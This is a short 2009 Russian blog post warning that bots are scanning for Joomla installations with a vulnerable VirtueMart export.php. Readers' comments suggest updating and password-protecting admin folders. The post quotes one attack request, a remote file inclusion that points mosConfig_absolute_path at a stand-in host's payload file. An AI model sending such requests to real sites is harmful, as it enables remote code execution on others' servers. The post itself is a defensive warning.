» Очередная дыра в Joomla-VirtueMart

Очередная дыра в Joomla-VirtueMart

Может и не такая новая, но сейчас массово лезут боты в попытках найти уязвимую установку Joomla.
Делают так:
GET /any-your-dir/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://already-victim/badfile.txt??

Friday, April 10th, 2009 12:34. Категория Web. Комментарии к этой записи через RSS 2.0. You can skip to the end and leave a response. Pinging is currently not allowed.

4 Responses to “Очередная дыра в Joomla-VirtueMart”

bender Says:
April 17th, 2009 at 22:03
А как с этим бороться - сайт из за этого отключил хостер.
(Включена подписка на комментарии)
Путник Says:
April 19th, 2009 at 4:25
кроме как обновиться - я дополнительно закрываю админки средствами .htpasswd

Если пригодится - с Вас ссылка ;)
Дмитрий Says:
July 24th, 2009 at 16:29
Уже не актуально. export.php просто нет по указанному адресу
Бижутерия Says:
December 11th, 2009 at 17:00
Есть кстати какой то компонент который добавляет к administrator дополнительный ключ, думаю поможет в этой беде.
(Включена подписка на комментарии)

Оставить комментарий - Feel free to ask me in English

Он появится после того, как будет одобрен. - All comments are pre-moderated.

Имя / Name

E-mail (НЕ публикуется / NOT visible to others)

Web-сайт

Подписаться на комментарии / subscribe to comments
(поле E-mail должно быть заполнено / e-mail must be fill in)

Внимание! Пожалуйста, не пишите в комментарии [url=... или [url]... - это будет считаться спамом. Если хотите дать ссылку - пишите просто адрес, до 2х на один коммент.
Attention! Please don't use "[url=..." or "[url]..." in comment's body or it will be deleted as spam If you want to send me a link just type url, up to 2 urls in one comment.

Спасибо за отзыв! Thank you for a comment!

посчитай-ка: 7 плюс 6 минус 7

Просто Путник